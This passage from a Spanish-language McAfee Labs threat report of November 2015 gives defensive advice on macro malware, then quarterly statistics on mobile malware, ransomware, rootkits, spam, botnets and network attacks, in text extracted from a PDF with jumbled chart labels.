extensión .doc o .xls.
No abra nunca mensajes de correo electrónico no deseados ni
archivos adjuntos que no esperaba recibir, incluso aunque provengan
de personas que conoce.
Tenga cuidado con el phishing basado en spam. No haga clic en
enlaces de mensajes instantáneos o de correo electrónico.
Controle los pings no previstos dirigidos a direcciones IP como
1.3.1.2 o 2.2.1.1, etc. desde ordenadores internos.
Tenga en cuenta que normalmente las facturas y recibos no
necesitan macros.
Utilice el software de Microsoft Office actualizado, que ofrece mejor
protección frente a este tipo de ataques.
Desconfíe de los documentos vacíos que piden a los usuarios activar
las macros para ver el contenido.
Compruebe que en la configuración predeterminada de la seguridad
de macros en los productos de Office se ha seleccionado el nivel alto.
Si desea saber cómo detectan los productos de Intel Security el malware para
macros, haga clic aquí.
Amenazas contra
dispositivos móviles
Malware
Amenazas web
Ataques a redes
Compartir opinión
Amenazas contra dispositivos móviles
Nuevo
paramóviles
móviles
Nuevomalware
malware para
1 400 000
Las nuevas muestras de malware
para móviles siguen aumentando.
Las infecciones han aumentado
también, pero no al mismo
ritmo, debido a las mejoras
en las defensas del sistema
operativo. El aumento del número
de muestras puede reflejar
los intentos por parte de los
agresores de sortear las defensas.
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Total
paramóviles
móviles
Totalde
demalware
malware para
10 000 000
9 000 000
8 000 000
7 000 000
6 000 000
5 000 000
4 000 000
3 000 000
2 000 000
1 000 000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Tasas de infección por malware para móviles por regiones
(3.er trimestre de 2015)
14 %
12 %
10 %
8%
6%
4%
2%
0
África
Asia
Australia
Europa
Norteamérica
América
del Sur
Tasas mundiales de infección por malware para móviles
22 %
20 %
18 %
16 %
14 %
12 %
10 %
8%
6%
4%
2%
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Malware
Nuevo malware
50 000 000
El "zoo" de nuevo malware de
McAfee Labs se redujo un 4 % este
trimestre, probablemente debido
a la gran variedad del número
de parásitos.
45 000 000
40 000 000
35 000 000
30 000 000
25 000 000
20 000 000
15 000 000
10 000 000
5 000 000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Malware total
500 000 000
El implacable aumento del
malware sigue adelante.
Esperamos cruzar la barrera de
500 000 millones para finales
de 2015.
450 000 000
400 000 000
350 000 000
300 000 000
250 000 000
200 000 000
150 000 000
100 000 000
50 000 000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Nuevos
New
Rootkitrootkits
Malware
100 000
El nuevo malware de tipo
rootkit se redujo un 65 %,
llegando a su nivel más bajo
desde 2008. Este descenso
se debe probablemente a que
han disminuido los beneficios
que reporta a los agresores.
Con Windows de 64 bits,
Microsoft pone en práctica las
firmas de controladores e incluye
PatchGuard, que complica a los
agresores considerablemente
la manipulación del kernel.
El repunte en el primer y el
segundo trimestre de 2014 se
debió a una sola familia de rootkit
que aparentemente desapareció.
90 000
80 000
70 000
60 000
50 000
40 000
30 000
20 000
10 000
0
Q4
2013
Q1
Q2
2014
Q3
Q4
Q1
Q2
2015
Q3
Total de
malware
tipo rootkit
Total
Rootkit de
Malware
1 800 000
1 600 000
1 400 000
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
Q4
2013
Q1
Q2
2014
Q3
Q4
Q1
Q2
2015
Q3
Nuevo
ransomware
New Ransomware
1 400 000
Las nuevas muestras de
ransomware se han reducido
un 40 % en el 3.er trimestre.
El incremento en el 2.º trimestre se
debió a Virus.Win32.PolyRansom.f,
una familia de ransomware
parásito que alteró el recuento
total debido a la rápida creación
de nuevas variantes.
1 200 000
1 000 000
800 000
600 000
400 000
200 000
0
Q4
2013
Q1
Q2
2014
Q3
Q4
Q1
Q2
2015
Q3
Total
ransomware
Totalde
Ransomware
5 500 000
5 000 000
4 500 000
4 000 000
3 500 000
3 000 000
2 500 000
2 000 000
1 500 000
1 000 000
500 000
0
Q4
2013
Q1
Q2
2014
Q3
Q4
Q1
Q2
2015
Q3
Nuevos archivos
binarios
firmados
New Malicious
Signed
Binariesmaliciosos
2 500 000
En el 3. trimestre descendieron
un 26 % los nuevos binarios
firmados maliciosos, justo la
mitad del número recopilado
en el 2.º trimestre en 2014.
er
2 250 000
2 000 000
1 750 000
1 500 000
1 250 000
1 000 000
750 000
500 000
250 000
0
Q4
2013
Q1
Q2
2014
Q3
Q4
Q1
Q2
2015
Q3
Total de archivos binarios firmados maliciosos
20 000 000
17 500 000
15 000 000
12 500 000
10 000 000
7 500 000
5 000 000
2 500 000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Nuevo malware para Mac OS
30 000
Los autores de malware se dirigen
cada vez más a la plataforma
Mac. A partir de este informe
comenzamos a seguir el malware
que ataca al sistema operativo
Mac OS. En comparación con el
2.º trimestre, en el tercer trimestre
se ha registrado cuatro veces más
malware para Mac OS. La mayor
parte de este incremento puede
atribuirse a una sola amenaza.
25 000
20 000
15 000
10 000
5000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Total de malware para Mac OS
60 000
55 000
50 000
45 000
40 000
35 000
30 000
25 000
20 000
15 000
10 000
5000
0
T4
2013
T1
T2
2014
T3
T4
T1
T2
2015
T3
Amenazas web
Nuevas URL sospechosas
35 000 000
30 000 000
25 000 000
20 000 000
15 000 000
10 000 000
5 000 000
0
T4
2013
T1
URL
T2
2014
T3
T4
T1
T2
2015
T3
Dominios asociados
Nuevas URL de phishing
2 500 000
2 250 000
2 000 000
1 750 000
1 500 000
1 250 000
1 000 000
750 000
500 000
250 000
0
T4
2013
URL
T1
T2
2014
T3
T4
T1
T2
2015
T3
Dominios asociados
Nuevas URL de spam
2 500 000
2 000 000
1 500 000
1 000 000
500 000
0
T4
2013
T1
URL
T2
2014
T3
T4
T1
T2
2015
T3
Dominios asociados
Volumen global de spam y correo electrónico
(billones de mensajes)
11,0
10,0
9,0
8,0
7,0
6,0
5,0
4,0
3,0
2,0
1,0
0
T4
2013
Spam
T1
T2
2014
T3
T4
T1
T2
2015
T3
Correo electrónico legítimo
Mensajes de spam de las 10 redes de bots principales
(millones de mensajes)
1400
Tras estar inactiva durante los
dos últimos trimestres, Kelihos,
que ofrece bienes de consumo
y productos farmacéuticos falsos,
reclama la primera posición en el
ranking de redes de bots de envío
de spam. Aunque el volumen
de redes de bots sigue bajo si
se compara con 2014, McAfee
Labs ha realizado hace poco
mejoras incrementales en nuestra
telemetría. Como resultado, el
volumen para el tercer trimestre
ha aumentado ligeramente.
1200
1000
800
600
400
200
0
T4
2013
T1
T2
2014
T3
T4
Kelihos
Darkmailer
Dyre
Slenfbot
Cutwail
Lethic
Gamut
Asprox
Stealrat
T1
T2
2015
T3
Otros
Prevalencia de redes de bots a nivel mundial
Wapomi se propaga como un
gusano e infecta archivos .exe.
Además, intenta descargar otros
archivos que crean un ataque de
denegación de servicio distribuido.
Su popularidad se debe
a esta frecuente propagación.
Sin embargo, muchos de los
servidores de control que
requiere ya son inalcanzables
debido a los sinkholes DNS.
Wapomi
Muieblackcat
21 %
29 %
2%
Sality
Ramnit
3%
Maazben
4%
5%
14 %
8%
12 %
Darkness
NGRBot
H-Worm
Otros
Principales países que albergan servidores de control de redes de bots
Estados Unidos
China
Alemania
26 %
Brasil
38 %
Rusia
6%
5%
4%4% 4%
4%
5%
Países Bajos
Corea del Sur
Argelia
Francia
Otros
Ataques a redes
Principales ataques a redes
Denegación
de servicio
Navegador
19 %
1%
2%
2%
30 %
Fuerza bruta
SSL
2%
Análisis
5%
Red de bots
16 %
23 %
Shellshock
Puerta trasera
Otros
Acerca de Intel Security
Comentarios. Para saber en
qué dirección orientarnos, nos
interesan sus opiniones. Si desea
transmitirnos sus impresiones,
haga clic aquí para completar
un rápido cuestionario de solo
cinco minutos sobre el informe
de amenazas.
Siga a McAfee Labs
McAfee. Part of Intel Security.
Avenida de Bruselas n.° 22
Edificio Sauce
28108 Alcobendas
Madrid, España
Teléfono: +34 91 347 8500
www.intelsecurity.com
McAfee forma ahora parte de Intel Security. Con su estrategia Security Connected,
su innovador enfoque de seguridad reforzada por hardware y su exclusiva red
Global Threat Intelligence, Intel Security trabaja sin descanso para desarrollar
soluciones y servicios de seguridad proactivos que protejan los sistemas, las
redes y los dispositivos móviles de uso personal y empresarial en todo el mundo.
Intel Security combina la experiencia y los conocimientos de McAfee con la
innovación y el rendimiento demostrados de Intel para hacer de la seguridad un
ingrediente fundamental en todas las arquitecturas y plataformas informáticas.
La misión de Intel Security es brindar a todos la tranquilidad para vivir y trabajar
de forma segura en el mundo digital.
www.intelsecurity.com
La información de este documento se proporciona únicamente con fines informativos y para la conveniencia de los
clientes de McAfee. La información aquí contenida está sujeta a cambio sin previo aviso, y se proporciona "tal cual"
sin garantías respecto a su exactitud o a su relevancia para cualquier situación o circunstancia concreta.
Intel y los logotipos de Intel y de McAfee son marcas comerciales de Intel Corporation o de McAfee, Inc. en EE. UU. y/o
en otros países. Los demás nombres y marcas pueden ser reclamados como propiedad de otros.
Copyright © 2015 Intel Corporation. 62189rpt_nov-threats_1215

Informe sobre amenazas de McAfee Labs Noviembre de 2015

Transcripción

Documentos relacionados

Hacking Ético, Forénsica Digital y Manejo de Incidentes

Informe de McAfee sobre amenazas: Primer trimestre de 2013

10 Consejos de Seguridad en Redes Sociales